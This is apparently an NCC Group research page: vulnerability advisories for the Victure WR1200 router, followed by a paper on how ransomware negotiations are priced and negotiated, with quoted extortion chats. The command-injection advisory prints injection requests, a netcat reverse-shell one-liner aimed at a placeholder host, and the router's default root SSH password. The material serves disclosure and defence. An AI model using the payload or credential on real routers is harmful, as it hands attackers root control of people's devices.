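For the placeholder BSSID above, the function returns the same password shown in the advisory, 46fd1cc5.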

Recommendation

• Change the WPA key for both 2.4GHz and 5GHz WiFi networks through the router’s web interface

OS Command Injection in Victure WR1200 WiFi router (CVE-2021-43283)

Vendor: Victure
Vendor URL: https://www.govicture.com
Versions affected: All versions up to and including 1.0.3
Systems Affected: WR1200
Author: Nicolas Bidron
CVE Identifier: CVE-2021-43283
Severity: Medium 6.8 (CVSS v3.1 AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)

Summary

Victure’s WR1200 WiFi router is a general consumer WiFi router with an integrated web interface for configuration. It was found that an attacker can inject shell commands through one of the forms on the web interface of the device.

Impact

A command injection vulnerability was found within the web interface of the device allowing an attacker with valid credentials to inject arbitrary shell commands to be executed by the device with root privileges. An attacker would thus be able to use this vulnerability to open a reverse shell on the device with root privileges.

Details

The “ping/traceroute” feature found under the Advanced/System Management portion of the web interface asks the user to enter an IP address to then perform a ping against that IP. By appending a semicolon ; to the domain field of the request, the attacker can successfully inject a command to be executed by the device.

e.g.:

request:

POST /cgi-bin/luci/;stok=REDACTED/admin/opsw/ping_tracert_apply HTTP/1.1
Host: 192.168.16.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 74
Origin: http://192.168.16.1
Connection: close

{"type":"setmonitor","kind":"ping","domain":"127.0.0.1; echo vulnerable"}

response:

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Cache-Control: no-cache
Expires: 0
Content-Length: 25

{"result":0, "msg":"..."}

The attacker can then attempt to retrieve the result of the last command executed by using the following request.

request:

GET /cgi-bin/luci/;stok=REDACTED/admin/opsw/ping_tracert HTTP/1.1
Host: 192.168.16.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: sysauth=REDACTED

response:

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Cache-Control: no-cache
Expires: 0
Content-Length: 45

{ "info": "vulnerable -c 4", "finish": 0 }
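
The "vulnerable -c 4" in the response suggests that the firmware pastes the domain field into a shell command line and appends " -c 4" after it. The Python sketch below models that assumed behaviour without executing anything, and contrasts it with one possible mitigation: accepting only literal IP addresses and building an argument list that needs no shell. The function names are hypothetical, and the real firmware code was not reviewed here. A real fix would also have to decide how to handle hostnames, which this sketch simply rejects.

```python
import ipaddress


def build_ping_unsafe(domain):
    # Assumed firmware behaviour: user input is concatenated into a shell string.
    return "ping " + domain + " -c 4"


def build_ping_safe(domain):
    # Accept only a literal IPv4/IPv6 address; ip_address() raises ValueError otherwise.
    addr = ipaddress.ip_address(domain.strip())
    # An argument list can be executed without a shell, so ';' has no special meaning.
    return ["ping", "-c", "4", str(addr)]


def shell_view(command):
    # Rough model of how a shell splits an unquoted command line at ';'.
    return [part.strip() for part in command.split(";")]


if __name__ == "__main__":
    payload = "127.0.0.1; echo vulnerable"
    print(shell_view(build_ping_unsafe(payload)))
    try:
        build_ping_safe(payload)
    except ValueError as err:
        print("rejected:", err)
```

Under this model the shell sees two commands, "ping 127.0.0.1" and "echo vulnerable -c 4", which matches the "info" value returned by the device.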

The following payload fed into the domain field can be used to open a reverse shell to any reachable host on the WAN or LAN network.

127.0.0.1 -c 1 ;rm /a;mkfifo /a;cat /tmp/a|/bin/sh -i 2>&1|nc X.X.X.X 1111 >/a;echo reverse_shell

Replace X.X.X.X in the above command with the IP address of a host waiting for an incoming connection. On the receiving host, apply an adequate firewall rule allowing incoming traffic on port 1111 and issue the following command to wait for the incoming connection from the router:

netcat -l -p 1111

Recommendation

This issue will remain exploitable to authenticated users as long as the Vendor doesn’t fix it through a new router firmware update.

Root SSH Access Enabled with Default Password on Victure WR1200 WiFi Router (CVE-2021-43284)

Vendor: Victure
Vendor URL: https://www.govicture.com
Versions affected: All versions up to and including 1.0.3
Systems Affected: WR1200
Author: Nicolas Bidron
CVE Identifier: CVE-2021-43284
Severity: High 8.8 (CVSS v3.1 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Summary

Victure’s WR1200 WiFi router is a general consumer WiFi router with an integrated web interface for configuration. It was found that the device offers SSH access on the local network, and that some of the accounts use default passwords that cannot be changed through the web interface.

Impact

An attacker with access to the local network can gain access with elevated privileges on the device through SSH even in cases where the admin password was successfully updated through the web interface.

Details

The device allows SSH access from its local network (WiFi and Ethernet) for two distinct users: admin and root. The admin user’s SSH password matches the password set for the admin user on the web interface. The root user’s SSH password is never updated from its default value of “admin”. This leaves an attacker able to gain control of the device through SSH whether or not the admin password was changed on the web interface.

Recommendation

Ensure the admin’s default password is changed through the web interface. Also change the root account default password by logging in as root on the router through SSH in the following manner:

ssh [email protected]
>passwd

Disclosure Timeline:

January 26th 2021: Initial email from NCC to Victure informing the vendor that vulnerabilities were found in one of their devices.

January 27th - February 2nd 2021: Multiple emails between Victure and NCC to agree on a secure method to deliver the vulnerability write-ups to Victure.

February 2nd 2021: Write-ups transmitted to Victure's representative through a verified WhatsApp chat session. Victure's representative then initiated a conversation between the software maintainer and NCC through Skype.

February 3rd 2021: The software maintainer acknowledged receipt of the bug write-ups on Skype.

October 12th 2021: NCC reached out to Victure again (not having heard from them since February 3rd 2021) to inform them of its intent to publicly disclose the bugs unless they could confirm a planned fix release within the next 30 days.

As of the publishing date of this Technical Advisory, no further communication from Victure has been received since February 3rd 2021.

Thanks to

Jennifer Fernick and Aaron Haymore for their support throughout the research and disclosure process.

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  11/12/2021
Written by: Nicolas Bidron

NCC Group Research

“We wait, because we know you.” Inside the ransomware negotiation economics.

Pepijn Hack, Cybersecurity Analyst, Fox-IT, part of NCC Group

Zong-Yu Wu, Threat Analyst, Fox-IT, part of NCC Group

Abstract

Organizations worldwide continue to face waves of digital extortion in the form of targeted ransomware. Digital extortion is now classified as the most prominent form of cybercrime and the most devastating and pervasive threat to functioning IT environments. Currently, research on targeted ransomware activity primarily looks at how these attacks are carried out from a technical perspective. However, little research has focused on the economics behind digital extortion and on digital extortion negotiation strategies using empirical methods. This research paper explores three main topics. First, can we explain how adversaries use economic models to maximize their profits? Second, what does this tell us about the position of the victim during the negotiation phase? And third, what strategies can ransomware victims leverage to even the playing field? To answer these questions, over seven hundred attacker-victim negotiations, between 2019 and 2020, were collected and bundled into a dataset. This dataset was subsequently analysed using both quantitative and qualitative methods. Analysis of the final ransom agreement reveals that adversaries already know how much victims will end up paying, before the negotiations have even started. Each ransomware gang has created its own negotiation and pricing strategies meant to maximize its profits. We provide multiple (counter-)strategies which can be used by the victims to obtain a more favourable outcome. These strategies are developed from negotiation failures and successes derived from the cases we have analysed, and are accompanied by examples and quotes from actual conversations between ransomware gangs and their victims. When a ransomware attack hits a company, it finds itself in the middle of an unfamiliar situation. One thing that makes such situations more manageable is having as much information as possible. We aim to provide victims with some practical tips they can use when they find themselves in the middle of that crisis.

Introduction

It is 1:30 on a Saturday morning. You just went to bed exhausted after a week of demanding work, but your phone is ringing, nudging you to wake up. It is your IT department on the line telling you to come to the office right now. Your company got hacked and all of the important data is encrypted, including the backup storage. The head of your IT department informs you it is a kind of virus called ransomware. After two long hours of phone calls, you have assembled a crisis management team and you open the ransom note. It redirects you to a TOR website where you can chat with the adversaries who hacked your company. Their demand is 3.5 million US dollars in cryptocurrency. You get a sinking feeling in your stomach. You have spent years building this company from the ground up. You hired all employees yourself, and know every single one of them by name. You start to realise that the weekend you planned away with your wife and kids is going to have to be cancelled. You need to be there now for your company. For all the families of the people that work for you. You open the chat and start typing. But after telling them you need more time to even start thinking about making a payment, all they respond with is – “We wait.”

After the adversary encrypts and exfiltrates the selected data, he sets an initial ransom demand. If the victim decides to engage in negotiation, both sides will try to reach an agreement on the final amount. With this research we wanted to investigate the phenomenon of ransomware negotiations. How do adversaries set the price of their ransom demand? What could be the final price adversaries would accept? How does the difference in information about each other impact the negotiation process? What does this tell us about paying or not paying the ransom? If companies do end up paying, are there strategies that the companies can utilize to lower the ransom demand?

We made use of both quantitative and qualitative research methods to answer these research questions. There have been some earlier reports and blog posts from security companies or news agencies on this topic. However, this research is mainly based on empirical approaches. We have used our own data, gathered from more than seven hundred negotiations between threat actors and victims. Using this data, we provide information and practical tips to victims who need it the most.

There is a negative sentiment in our society towards paying or negotiating with criminals, and the legitimacy and ethics of it are also questionable to say the least. Nonetheless, we realise that a significant percentage of companies currently do end up paying the ransom demand. Our research demonstrates that the adversaries have a significant upper hand in the negotiation process. They often know how much a victim would pay in the end, providing them with a comfortable vantage point in the negotiations. We hope to achieve a twofold goal with our research: firstly, we discourage victims from engaging with the adversary. However, should there be no choice but to negotiate, the second half of our paper provides tips on how to do so successfully.

The paper is structured in two parts. The first half starts by providing a short background on how ransomware as a service (RaaS) and its economy developed, and goes on to model how adversaries are able to use price discrimination to maximize their profit. We then illustrate the information asymmetry between the victims of a ransomware attack and the attackers themselves using our datasets. The second half digs deeper into the negotiation process, and provides practical tips and strategies that can be used during the negotiation phase, should it prove to be unavoidable. In the final paragraphs, we summarize our findings and explore the future possibilities of how to deal with the phenomenon of ransomware, not only as individuals under attack, but as a society as a whole.

Data Collection

In this research, we primarily focused on two different ransomware strains. The first dataset was collected in 2019. This was a period when targeted ransomware attacks were emerging and only a handful of groups were engaged in this business model. At that time, the adversaries were relatively inexperienced and ransom demands were lower compared to today’s ransom amounts. The second dataset was collected in late 2020 and through the first couple of months of 2021. By this time, ransomware attacks had become a major threat to companies worldwide. Not only had the maturity of the operations improved, but there had also been an underground market shift to targeting big and profitable enterprises. The owners of the second ransomware strain specifically positioned themselves in the market to only target big and profitable enterprises. The first dataset consists of 681 negotiations, and the second dataset consists of 30 negotiations between the victim and the ransomware group. Due to the sensitive nature of our data, we cannot share further details as we have an obligation to protect our sources.

Ransomware Economics

As most adversaries have claimed, ransomware attacks are nothing but business. Ransomware groups try to achieve the highest possible profits. That is their primary motivation. In this section, we try to model the factors that drive the adversaries’ decisions when seeking profit. The model is somewhat rudimentary, but can be used to explain key factors which impact the decision making of the adversaries as well as their victims.

Hernandez-Castro, et al. [5] explain their hypothesis in their paper “Economic Analysis of Ransomware” and used small scale surveys to get some preliminary results. Based on their model, which we have updated, our research goes beyond this and tests our hypothesis based on actual ransomware negotiation cases.

First and most importantly, the total profit is not only influenced by the amount of ransom they demand from the victim. It also depends on whether the victim decides to pay, and on the costs of the operation. Instead of studying a single ransom gain, the total profit throughout a series of attacks should be taken into consideration. Take two examples: an organised cybercrime group which only hunts for big targets and asks for millions of dollars, but only 5% of the victims pay. We compare this with another group which only asks for ten thousand dollars, but 20% of the victims pay. Evidently, these two business strategies lead to different profit gains. Furthermore, the cost of running a criminal operation should be included in the calculation. We use the following formula to calculate the overall profit from the adversary’s perspective.

We describe P as the total profit taken by the criminal from N number of victims:

$$P = \sum_{i=1}^{N} \left( r_i \cdot l_i \cdot m_i \cdot f(i) - c_i \right)$$

•  ri is the final ransom demand in case i.
•  li is the percentage left after exchanging the cryptocurrency to “clean” currencies.
•  mi is the percentage left after paying the commission fee for the RaaS platform. This fee depends on the rules of the RaaS platform and the total ransom. It could cost from 10 to 30 percent of the ransom. In some cases, this commission fee is 0 as some adversaries use in-house ransomware tool kits.
• f (i) is the final decision made by the victim on whether to pay or not. f (i) can be either 0 or 1, with 0 meaning the victim decided not to pay and 1 meaning the victim did pay.
• ci is the cost of carrying out the attack. The detailed explanation can be found in the following paragraph.

Using this formula, we can calculate the adversaries’ profit for N number of victims. Let us assume we have two victims. Therefore, N = 2, the ransom demand is $100,000 in bitcoin in both cases (ri), the exchange cost is 10% (li = 90%), and the RaaS fee is 20% of the ransom (mi = 80%). Only the second victim pays, and the cost of carrying out each attack is $50 (ci).
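
The two-victim example can be checked with a short script. This is a minimal sketch, assuming the per-case profit is ri * li * mi * f(i) - ci summed over all cases, which is the form used by the arithmetic in this section. The function and field names are ours, not the authors'.

```python
def case_profit(r, l, m, paid, c):
    """Profit from one victim: r * l * m * f(i) - c, with f(i) = 1 if the victim paid."""
    return r * l * m * (1 if paid else 0) - c


def total_profit(cases):
    """Total profit P over all victims."""
    return sum(case_profit(**case) for case in cases)


# Values from the worked example: $100,000 demand, 10% exchange cost,
# 20% RaaS commission, $50 attack cost, only the second victim pays.
cases = [
    {"r": 100_000, "l": 0.9, "m": 0.8, "paid": False, "c": 50},
    {"r": 100_000, "l": 0.9, "m": 0.8, "paid": True, "c": 50},
]

if __name__ == "__main__":
    for number, case in enumerate(cases, start=1):
        print("case %d: %.2f" % (number, case_profit(**case)))
    print("total: %.2f" % total_profit(cases))
```

Changing `paid` or `r` in the list makes it easy to compare pricing strategies, for example many small ransoms with a high payment rate against a few large ransoms with a low one.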

In the first case the profit is ($100,000 * 0.8 * 0.9) * 0 – $50 = -$50. In the second case the profit is ($100,000 * 0.8 * 0.9) * 1 – $50 = $71,950. The total profit of the ransom attack is $71,950 + (-$50) = $71,900. In reality, each variable in the equation will be larger than in the example we have used. However, as you can tell, when an adversary is able to find a sweet spot where profit can be maximized, it can be an incredibly profitable business. On the other hand, if fewer and fewer victims decide to pay, or the ransom paid is less than the adversaries expected, it becomes a challenge to keep their business running.

The variables affecting the cost of carrying out the attack (ci) can include:

• Risk cost: These are the costs of avoiding being held accountable. It might include setting up proxies, hiding human factor evidence and even bribing local authorities.
• Penetration cost: It is the cost of accessing the targets’ network. It might include, for example, hiring skilled hackers, buying access to malware/exploits/distribution services and any other form of illegal access into the targets’ network. If the adversary uses a home-brew crypto locker, its cost should be included as well.

As for f (i), it is a function which models the decision of whether to pay the ransom or not. Even though in the end it is a binary decision, being either a yes or a no, the major variables affecting this decision can include:

• Ethics: There are certain companies who do not cooperate with the adversary whatsoever.
• ri : The ransom amount strongly impacts the decision whether or not to pay.
• Remediation cost: These are the costs of restoring backups, restarting any services, and compensating affected customers.
• Regulation cost: These are the estimated costs of paying the fine for the data breach (like GDPR fines).

Maximise the Profit – Finding Pricing Strategy from the Final Ransom Deal

In the earlier years, groups behind ransomware strains used a uniform pricing strategy, which meant they asked a fixed price after each infection. For example, CryptoLocker demanded a payment of 400 USD or EUR per victim. However, the ecosystem has evolved into multiple-extortion schemes, each with its own price discrimination approach.

There are three classic types of price discrimination [6]. First-degree price discrimination (personalized pricing) is perfect price discrimination, where each consumer is charged a different price based on their own willingness and ability to pay. Second-degree price discrimination occurs, for example, when the buyer gets a discount for bulk purchases. Third-degree price discrimination happens when the price depends on personal traits of the consumer such as age or gender. In the case of a ransomware attack this could be the size of the company or the number of servers encrypted.

We have seen different actors adopting second- and third-degree price discrimination in ransom pricing. A Chinese cybercrime group asked a relatively high initial price for decrypting fewer than 10 locked computers, with the price sliding downwards once a bulk number of decryptors was sold. This is an example of second-degree price discrimination. On the other hand, based on our data, the two groups we looked at were both multiple-extortion ransomware gangs, and both used third-degree price discrimination.

In our dataset D-first, 17% (N = 116) of the 681 victims proceeded to pay the ransom, with an average amount of $400,767.05 per victim. Of the 116 victims who paid, the revenue of 32 companies was known to us.

In the above example, the initial ransom price was set according to multiple variables. Finding out how the initial price is set and what it represents is important. However, this is beyond the scope of our research because it is rather difficult to get access to these decision-making processes only residing within a criminal organisation. Thus, we focused on studying only the final ransom deal, which may tell a more accurate story on how the hidden price, or maybe a baseline, is set.

A negotiation starts with an adversary demanding an initial ransom. Then, the victim has the option to ask for a lower price, or what adversaries call a ‘discount’. Both sides offer their ideal price back-and-forth. Intuitively, one would assume that the adversary did not know how much a victim was willing to pay. However, we used a metric, Ransom per annual Revenue (in million USD), to demonstrate that the result could differ from what our intuition tells us. This ratio tells us how much the victim paid per million dollars in revenue. To calculate the RoR (Ransom per annual Revenue), we divided the ransom by the annual revenue the company made in the last year before it was attacked.
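
As a rough illustration of the metric, the sketch below computes RoR as dollars of ransom per million dollars of annual revenue, and converts it to a percentage of revenue. The function names and the example figures (a $500,000 ransom against $250 million in revenue) are hypothetical and not taken from the datasets.

```python
def ransom_per_million_revenue(ransom_usd, annual_revenue_usd):
    """RoR: ransom paid per one million USD of annual revenue."""
    if annual_revenue_usd <= 0:
        raise ValueError("annual revenue must be positive")
    return ransom_usd / (annual_revenue_usd / 1_000_000)


def ror_as_percent_of_revenue(ror):
    """Express an RoR value (USD per million USD) as a percentage of revenue."""
    return ror / 1_000_000 * 100


if __name__ == "__main__":
    # Hypothetical victim: $500,000 ransom, $250 million annual revenue.
    ror = ransom_per_million_revenue(500_000, 250_000_000)
    print("RoR: %.0f USD per million USD of revenue" % ror)
    print("Share of revenue: %.2f%%" % ror_as_percent_of_revenue(ror))
```

In this made-up case the victim pays $2,000 per million in revenue, or 0.2% of annual revenue. Comparing that figure across victims, rather than the absolute ransom, is what lets payments from companies of very different sizes be placed on one scale.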

Interestingly, most of the final negotiated ransom prices fell into a certain margin, but there are also some outliers. We can further divide the victim companies into two categories based on their estimated revenue. D-first-small and D-first-mid represent small (revenue < 100 million USD per year) and medium size (revenue >= 100 million USD per year) companies, respectively.

The results show that the adversaries behind the datasets we collected knew how much ransom a victim was willing to pay before the negotiation had started.

Another interesting observation is that smaller companies generally pay more from a RoR point of view. In other words, a smaller company pays less in absolute terms but more as a percentage of its revenue. This observation also holds in the second dataset.

The highest ransom payment within the datasets was 14 million. This was a case from the second dataset in which the ransom was paid by a Fortune 500 company; it amounted to only $822 per million in revenue, or 0.0822% of the annual revenue. The median ransom of the small enterprises in the first dataset was found to be 0.22%. The duration of participating in criminal activities affects the Risk Cost significantly. It is therefore understandable that a financially motivated actor could cherry-pick valuable targets and profit from just a few big ransoms instead of attacking small companies. This has indeed led a few ransomware groups to decide to target only big and profitable enterprises. In the second dataset (D-second), around 14% (N = 15) of 105 victims paid, with an average amount of $2,392,661 per victim. The owners of this second RaaS platform take a smaller commission when the actor receives a higher ransom. Therefore, there is an incentive for actors using the second RaaS platform to target high-profile companies.

Maximise the Profit – Discussion

We realise that there are limitations to this research. We cannot say for certain that the set of identified victims is representative of the entire population. Furthermore, based on our qualitative research we know that ransomware groups also use other factors to determine the price, such as the number of computers and servers that are encrypted, the number of employees or the expected amount of media exposure a company will receive if people find out it got compromised. Unfortunately, these factors are not all open-source and are therefore more difficult to compare. Although our dataset shows that the final ransom price correlates with the victim’s revenue, it cannot fully explain how adversaries set the ransom demands.

Do we negotiate with criminals?

Even though we have painted a bleak picture in our previous analysis, not all hope is lost. Despite their best efforts, the adversaries attacking companies are also just humans, and humans make mistakes or can be influenced into making certain decisions. In the next two sections we will try to explain what options are left when the decision to negotiate is made.

Process-based tips before the negotiation starts

Although the focus of our research was the negotiation phase of a ransomware attack, we also wanted to provide some guidelines and tips on what to do before the negotiations start. We will not go into all things related to crisis management strategies, as there is already an abundance of training and information on the topic available online and in print. We will, however, touch upon some topics that we feel are not always covered in other sources, and which we learned from reading the negotiations between ransomware groups and victims.

1.    Preparing employees

The first thing any company should teach its employees is not to open the ransom note and click on the link inside it. In the D-second database, and we have seen this with other adversaries as well, the timer starts to count when you click on the link. You can give yourself some valuable time by not doing this. Use this time to assess the impact of the ransomware infection. Address this in a structured manner by asking the following questions: Which parts of your infrastructure are hit? What kind of consequences does this have for your day-to-day operation? How much money are we talking about? This will allow you to regain a degree of control over the situation and plan your strategy better.

Secondly, before you start negotiating, you should discuss your goal. What is it that you want to achieve? Is your technical department (perhaps with some outside help) able to restore the backups and do you need to extend the timer, or are you going for a lower ransom? It is also important to decide what ransom demand would be your best- and worst-case scenarios. You will only learn the actual demand when you click on the link, but you should at least make an estimation of what you could pay before you open a conversation with the adversary.

3.    Communication lines

Another important thing to think about is setting up internal and external communication lines. Who is going to be responsible for what? A ransomware attack is not just an IT issue. Involve your crisis management team and your board to answer strategic questions. Involve legal counsel who can help answer questions about possible cyber insurance coverage, and who will know the rules and regulations regarding any institutions that need to be informed about data breaches. Also do not forget your communications department. It is becoming more common for adversaries to inform the media that they have hacked a company. This is done to put extra stress and pressure on the company’s decision making. Realising this beforehand and having a media strategy prepared will help you take control of the situation and mitigate possible damage.

4.    Inform yourself

Lastly, we advise you to get informed about your attacker. Do some research yourself about their capabilities or hire a specialised company with a threat intelligence department. They can tell you more about the peculiarities of the adversary you are dealing with. Perhaps they have a decryptor which is not available online or know of another company who might be of help. They can also tell you more about the reliability of the adversary you are dealing with. Furthermore, knowing whether you should expect a DDoS attack, calls to your customers, or the leakage of information to the press will be useful information to incorporate into your crisis management strategy.

Negotiation strategies

If the decision to pay the ransom is made, there are still ways to lessen the damage. Based on the analysis of more than 700 cases we can give the following advice. Note that using just one of these strategies in your negotiation will not help as much, but implementing as many of them as possible could save companies millions of dollars.

1.    Be respectful

This first tip might sound obvious, but crises can be emotional rollercoasters. Owners of companies can see their life’s work vanish in front of their eyes, like watching their house burn to the ground. We have seen multiple examples of companies getting frustrated and angry in conversations with threat actors, resulting in chats being closed. Look at the ransomware crisis as a business transaction. Hire outside help if needed, but stay professional. From the study of the D-first database we learned that there is a negative relation between being kind and the amount of ransom paid in the end. One example of someone who went above and beyond during a negotiation is the following. This person managed to talk the ransom down from 4 million to 1.5 million dollars.

“Thanks Sir. We can pay 750,000 USD in XMR, provided that you will share with me the exact scope, volume, and significance of data that is in your possession. (…) I do stress the data, rather than the decryption key, since I learned about your very positive reputation in providing decryption keys. Looking forward hearing your thoughts. Respectfully, {victim’s name}.”

This example shows that not only should you see the negotiation as a business transaction, but it is also best to leave your emotions outside of the conversation.

2.    Do not be afraid to ask for more time.

Adversaries will usually try to pressure you into making quick decisions. This is often done by threatening to leak documents after a certain amount of time or by threatening to double the ransom. The more stress the adversary can impose on you, the worse your decision making will be. However, in almost all D-second cases the adversary was willing to extend the timer when negotiations were still ongoing. This can be helpful for several reasons. At the beginning of the process, you will need time to assess the situation and rule out any possibilities of restoring your data. Similarly, it can give you extra time to produce different strategies. If you decide to pay in the end, you will need to make arrangements to acquire the right cryptocurrency.

We have seen examples of cases in which the negotiation went on for multiple weeks after the deadline. In this case the deadline had already passed two days earlier:

“Hello, I’m going to be as up front and honest as I can be right now and let you know that we have not been able to secure the 12 million dollars and we also have just now been able to download the data that you took so that we can review it. If at all possible, we need some more time to get together what we can get together to, at the very least, make a reasonable offer. Coming up with the 12 million is almost impossible but if it doubles, there’s no way we will be able to come up with the money. Just a few more days and we should be in a position to give you a realistic and reasonable offer. Any help would be greatly appreciated!”

After being asked how much time they needed, the victim responded that they would need at least another week. The adversary agreed to this on the condition that the victim guaranteed a payment of 1 million within 24 hours; otherwise the price would be doubled to 24 million. The victim responded to this by saying:

“I understand that and trust me, we are really trying here. This is exactly why I asked for more time. We have been working all night to gather just the funds to buy more time and we aren’t there. 1 million isn’t going to be possible right now 12 million is definitely going to take more time than 1 million and 24 million just isn’t possible at all really. This is the situation we are in right now. All we’ve asked for is more time and you are going to pass up on a potentially big payday over just giving us a few more days? How much effort would it take on your part just to give us a little more time? You’ve already taken our data and crippled our business. What more effort do you have to put forth to just work with us and give us a few more days. I’ve told you multiple times that we are trying like hell to get this money together from the moment you locked us down. Give us the time and we’ll get whatever we can get together and we’ll continue to communicate with you or don’t give us the time and get nothing. We’ll recover from this or we won’t and you will have put a bunch of people out of work that have been here for their entire careers. This is our livelihoods, this is how we feed our families, this is how we pay our bills. Please try and keep that in mind.”

In the end they paid 1.5 million dollars in cryptocurrency. Another way to get more time is to explain that higher-ups need more time to make decisions, or that you need more time to buy crypto:

“Not to mention it’s the weekend here and the banks or crypto buying sites aren’t open to get anything converted. Your timer runs out tomorrow. Just give us a few more days. We are trying here but we need a little help from you.”

3.    Promise to pay a small amount now or a larger amount later.

Whereas stalling for time can be an effective strategy if you want to prevent your data getting leaked while rebuilding your systems, the following strategy can help you negotiate a smaller amount. Adversaries also have an incentive to close a deal quickly and move on to their next target. In multiple cases we have seen that the adversary in the D-second database gave large discounts when presented with the option of getting a small amount of money now instead of a large amount of money later. In one case the adversary said the following after an initial demand of 1 million US dollars:

“I spoke to my boss and explained your situation to him. He approved a payment of 350k dollars. There will be no more discounts. Now you are offering 300k dollars, raise your price by 50k and we will close this deal now.”

4.    Convince the adversary you cannot pay the high ransom amount.

One of the most effective strategies is to convince the adversary that your financial position does not let you pay the ransom amount that is initially asked. In one example a company was asked to pay 2 million and responded with the following:

“We have discussed this with our management team. We do want the decryptor for our network and for our data to be deleted, but you have asked for a lot of money especially at the end of a difficult year. Can you offer us a lower price?”

They got a 50K discount and ended up paying 1.95 million. Although this seems like a good deal, there are cases in which much less was paid after a more drawn-out negotiation in which the victim was not as willing to pay. Two examples are companies that were each initially asked to pay 1 million: one ended up paying 350K and the other only 150K. There is also an example of a victim who talked the price down from 12 million to 1.5 million.

These companies achieved this by constantly stressing they could not pay the amount that was asked. One example of this is:

“Our overall revenue has suffered significant impacts in the past year and we are still losing more and more money by the day. Your demand of 12 million dollars is a large portion of our entire revenue for all of last year. You may not know anything about us as a company but we provide a vital service for our clients and this incident has affected not only our business but also many many people and other businesses that rely on us and our services. With all of that being said, we are still willing to pay something to get our data unlocked and not have our client’s information out on the internet for everyone to see. What we can offer you is 1,000,000 USD in bitcoin today to be done with this”.

Later they said:

“(…) With that being said, this payment is out of our own pockets and the million dollars is what we had. We’ve been in discussions all day with our team and we are willing to up our offer to 1,200,000 USD. Work with us here, we are paying for this out of pocket.”

“We’ve looked everywhere and tapped every resource we can tap and taken out every loan we can take out and we’ve been able to come up with another 150k to bring our offer to 1,350,000 USD.”

“We are doing the absolute best we can. With that being said, the owner of the company has agreed to take 50k out of his own pocket to further increase our offer to 1,400,000 USD. That is a hell of a lot of money for anyone and especially us. This is not only affecting our company, it’s affecting PEOPLE real, honest, and hard working people. Basically where we are at right now is that you can take this 1.4 million dollars to make sure that our data doesn’t get released or release the data and it’s worthless from a payment standpoint. There will be no reason at all for us to pay for anything to you once that’s done. We’ll focus our efforts on rebuilding our reputation and rebuilding our business. Please think about the two options here. Thank you for your consideration.”

After this the adversary agreed to the amount of 1.5 million, which the victim ended up paying.

Now you might ask yourself: this technique might work for companies who do not have that much money, but what about bigger companies with an obviously larger budget at their disposal? Does the adversary not have access to the financial statements of companies when they get hacked? One of the D-second victims was a Fortune 500 company that received this response from the adversary after telling them that they could pay 2.25 million at most:

“Thank you for your offer but we have a counteroffer. Let me do some pretty important points. The first you are one of Fortune 500 companies with a revenue 16-18 billion, am I right? You produce kind of very important product right now (…) and because online business is booming right now. Back to the numbers we had encrypted 5,000-6,000 of your servers (…). So, if we do same VERY simple calculation. Your expenditures like, let say I don’t know $50 per hour or may me you are even more generous like $65? So, 24 hours spent to restore one server multiply per one encrypted by us server, this is like 10 million dollars in expenditure only on a labour, but don’t forget you spent all this time for installation and OOPS you can’t even restore any data because this is gone for next 1000 year of intensive calculations. The timer it ticking and in in next 8 hours your price tag will go up to 60 million. So, you this are your options first take our generous offer and pay to us $28,750 million US or invest some monies in quantum computing to expedite a decryption process.”

As you can see, the adversary is not very willing to compromise. However, it seems they did not do a deep dive into the financial records of this company. They primarily talk about the servers they hacked. We speculate this might be because the ability to hack companies and the ability to read and dissect complex financial statements do not overlap much. Even if they have access to those files, there is a difference between having a certain amount of revenue and having a couple of million dollars in crypto lying around just for the occasion. In this example the company ended up paying 14.4 million instead of the 28.75 million which was asked initially.

5.    If possible, do not tell anyone you have cyber insurance

Our last negotiation strategy is that you must not mention to the adversary that you have cyber insurance, and preferably you should also not save any documents related to it on any reachable servers. These are two examples of messages from chats in which the adversary knew the victim had insurance:

“Yes, we can prove you can pay 3M. Contact your insurance company, you paid them money at the beginning of the year and this is their problem. You have protection against cyber extortion. (…) I know that you are now in trouble with profit. We would never ask for such an amount if you did not have insurance.”

“Look, we know about your cyber insurance. Let’s save a lot of time together? You will now offer 3M, and we will agree. I want you to understand, we will not give you a discount below the amount of your insurance. Never. If you want to resolve this situation now, this is a real chance.”

Although a company could still tell the adversary that the insurance company is not willing to pay, this severely limits the options for any negotiation.

Some practical tips during the negotiation

Besides the process-based strategies before and during the negotiation, we also want to give a few tips that should be followed regardless of your strategy:

1. The first thing any company should do is try to set up a different means of communication with the adversary; if the adversary does not want to switch, the company should realise its communication is not private. Getting access to these chats is not the most demanding thing for technically skilled people. It has happened multiple times that a chat was infiltrated during a negotiation by third parties who started interfering with and disturbing the negotiation.

2. Always ask for a test file to be decrypted. Although most infamous adversaries have a decent reputation nowadays, you can never be too sure.

3. Make sure to ask for proof of deletion of the files if you end up paying. There are examples of companies who paid, but whose files are still openly accessible online.

4. Always prepare for a situation in which your files will still be leaked or sold. Despite what the adversaries may show you, you have absolutely no guarantee that your files were deleted. Especially with RaaS platforms, your system access and files will have gone through many different parties before they reached the final adversary you were negotiating with. Even if they properly deleted your files, who’s to say that none of the other people in the chain quickly made a copy of some interesting files for ‘personal usage’?

5. Ask for an explanation of how the adversary hacked you. In one case a company received an extensive report from the adversary on how they got access and what the company should do to close any vulnerabilities.

Chat conversation between a victim and a D-second adversary

In this example we see the use of multiple negotiation strategies. The victim asks for more time, and successfully talks down the ransom demand from 13 million to 500K.

“Hello. Can we please get some sample files you took from us? Thank you”

“Hello. we took all files by our filters , round- about 2 TB. What proofs you want see? We will send proofs in 12 hours round about. 100 screenshots from infrastructure and evidence pack of data.”

